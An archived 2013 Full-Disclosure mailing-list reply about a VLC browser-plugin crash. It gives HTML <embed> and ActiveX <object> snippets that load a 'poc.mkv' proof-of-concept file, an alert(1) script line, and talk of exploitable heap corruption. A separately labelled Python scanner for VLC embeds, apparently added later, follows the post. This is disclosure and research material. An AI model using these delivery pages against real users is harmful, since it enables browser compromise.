Open Source and information security mailing list archives
Date: Wed, 10 Jul 2013 17:45:01 +0530
From: Sachin Shinde <sachinshinde1102@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Full-Disclosure Digest, Vol 101, Issue 10

Hi,


Please, please, please try to understand the attack vectors, guys (please
think of all the cases before giving up).

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
<html>
<head><title>Demo of VLC mozilla plugin</title></head>

<body>

<h1>Demo of VLC mozilla plugin - Example 1</h1>

<embed type="application/x-vlc-plugin"
         name="video1"
         autoplay="no" loop="yes" width="400" height="300"
         target="poc.mkv" />
<br />
  <a href="javascript:;" onclick='document.video1.play()'>Play video1</a>
  <a href="javascript:;" onclick='document.video1.pause()'>Pause video1</a>
  <a href="javascript:;" onclick='document.video1.stop()'>Stop video1</a>
  <a href="javascript:;" onclick='document.video1.fullscreen()'>Fullscreen</a>

</body>
</html>


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

<script>alert(1)</script>
<object
  classid="clsid:9BE31822-FDAD-461B-AD51-BE1D1C159921"
  codebase="http://download.videolan.org/pub/videolan/vlc/last/win32/axvlc.cab"
  id="vlc"
  name="vlc"
  class="vlcPlayer"
  events="True">
    <param name="Src" value="poc.mkv" />
    <param name="ShowDisplay" value="True" />
    <param name="AutoLoop" value="True" />
    <param name="AutoPlay" value="True" />
</object>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Now the real problem is that plugins are executed outside of the browser
process, except in IE.


You can use my gist mediafuzz for fuzzing file formats in the browser (with
minor modifications):
https://gist.github.com/cons0ul/2357771

Best,
Sachin Shinde
@cons0ul





On Wed, Jul 10, 2013 at 5:22 PM, Sachin Shinde
<sachinshinde1102@...il.com> wrote:

> Finally someone dumping debug logs on FD :)
>
> Here are my debug logs:
>
>
> http://paste.ofcode.org/gcRAJB9ixqLKtxDBiyfvWv
> http://paste.ofcode.org/BtL95whhBFDPXiKPeF8ViJ
>
> The PoC crashes VLC at different addresses (I have seen 3 different addresses
> so far).
> Looks like heap corruption, can be exploited if the VLC plugin crashes in the
> browser :)
>
> Cheers,
> Sachin Shinde
> @cons0ul
>


Download attachment "vlc_chrome.JPG" of type "image/jpeg" (34339 bytes)

Download attachment "vlc_firefox.JPG" of type "image/jpeg" (78781 bytes)

Download attachment "vlc_ie.JPG" of type "image/jpeg" (70484 bytes)
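As an added defensive example (not part of the original post, and not VLC project code): a small Python scanner that flags HTML embedding the VLC browser plugin in either of the two forms shown above, the Mozilla `<embed type="application/x-vlc-plugin">` and the ActiveX `<object classid="clsid:9BE31822-...">`, and reports which media file the page would load and whether playback starts without user interaction. The sample HTML, the `example.invalid` codebase URL and the choice to treat a missing `autoplay` attribute as "plays automatically" are assumptions of this example.

```python
# Added example (not from the post): flag HTML that embeds the VLC plugin and
# report the media file it would load plus whether it auto-plays.
from html.parser import HTMLParser

VLC_MIME = "application/x-vlc-plugin"                      # <embed> form, from the post
VLC_CLSID = "clsid:9be31822-fdad-461b-ad51-be1d1c159921"   # ActiveX form, from the post


class VlcEmbedScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._current = None  # <object> currently being collected, if any

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "embed" and a.get("type", "").lower() == VLC_MIME:
            # Assumption: absent autoplay attribute is treated as auto-playing (conservative).
            self.findings.append({
                "kind": "embed",
                "src": a.get("target") or a.get("src", ""),
                "autoplay": a.get("autoplay", "yes").lower() not in ("no", "false", "0"),
            })
        elif tag == "object" and a.get("classid", "").lower() == VLC_CLSID:
            self._current = {"kind": "activex", "src": "", "autoplay": False,
                             "codebase": a.get("codebase", "").strip()}
        elif tag == "param" and self._current is not None:
            name, value = a.get("name", "").lower(), a.get("value", "")
            if name == "src":
                self._current["src"] = value
            elif name == "autoplay":
                self._current["autoplay"] = value.lower() in ("true", "yes", "1")

    def handle_endtag(self, tag):
        if tag == "object" and self._current is not None:
            self.findings.append(self._current)
            self._current = None


def scan_html(html):
    """Return one finding per VLC plugin instance found in the HTML."""
    parser = VlcEmbedScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample modelled on the two snippets in the post (codebase URL is a placeholder).
SAMPLE = """<embed type="application/x-vlc-plugin" name="video1" autoplay="no" target="poc.mkv" />
<object classid="clsid:9BE31822-FDAD-461B-AD51-BE1D1C159921" codebase="http://example.invalid/axvlc.cab">
<param name="Src" value="poc.mkv" /><param name="AutoPlay" value="True" /></object>"""
```

Run `scan_html(SAMPLE)` to get two findings: the `<embed>` with autoplay off and the ActiveX object with autoplay on; a proxy or crawler can use the same logic to alert on pages that auto-load media through the plugin.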

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
